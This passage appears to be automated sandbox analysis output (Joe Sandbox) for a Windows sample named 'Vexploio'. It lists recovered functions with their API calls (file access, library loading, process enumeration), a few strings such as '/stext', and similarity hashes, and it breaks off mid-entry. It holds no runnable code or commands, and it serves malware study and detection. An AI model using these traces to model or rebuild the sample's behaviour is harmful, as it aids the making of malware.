                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: BINARY
                              • API String ID: 2221118986-907554435
                              • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                              • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                              APIs
                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                              • String ID:
                              • API String ID: 1161345128-0
                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: /stext
                              • API String ID: 2081463915-3817206916
                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                              APIs
                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                              • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                              • String ID:
                              • API String ID: 159017214-0
                              • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                              • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                              APIs
                              Strings
                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: malloc
                              • String ID: failed to allocate %u bytes of memory
                              • API String ID: 2803490479-1168259600
                              • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                              • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcmpmemset
                              • String ID:
                              • API String ID: 1065087418-0
                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                              APIs
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • memcpy.MSVCRT ref: 00406E09
                              • memcpy.MSVCRT ref: 00406E5A
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$??2@
                              • String ID:
                              • API String ID: 3700833809-0
                              • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                              • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                              • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                              • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                              • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpymemset
                              • String ID:
                              • API String ID: 1297977491-0
                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                              APIs
                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                              • String ID:
                              • API String ID: 1481295809-0
                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                              APIs
                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                              • String ID:
                              • API String ID: 3150196962-0
                              • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                              • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                              APIs
                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$PointerRead
                              • String ID:
                              • API String ID: 3154509469-0
                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                              APIs
                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PrivateProfile$StringWrite_itowmemset
                              • String ID:
                              • API String ID: 4232544981-0
                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                              APIs
                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                              APIs
                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$FileModuleName
                              • String ID:
                              • API String ID: 3859505661-0
                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                              APIs
                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                              APIs
                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                              APIs
                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                              • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                              APIs
                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                              APIs
                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
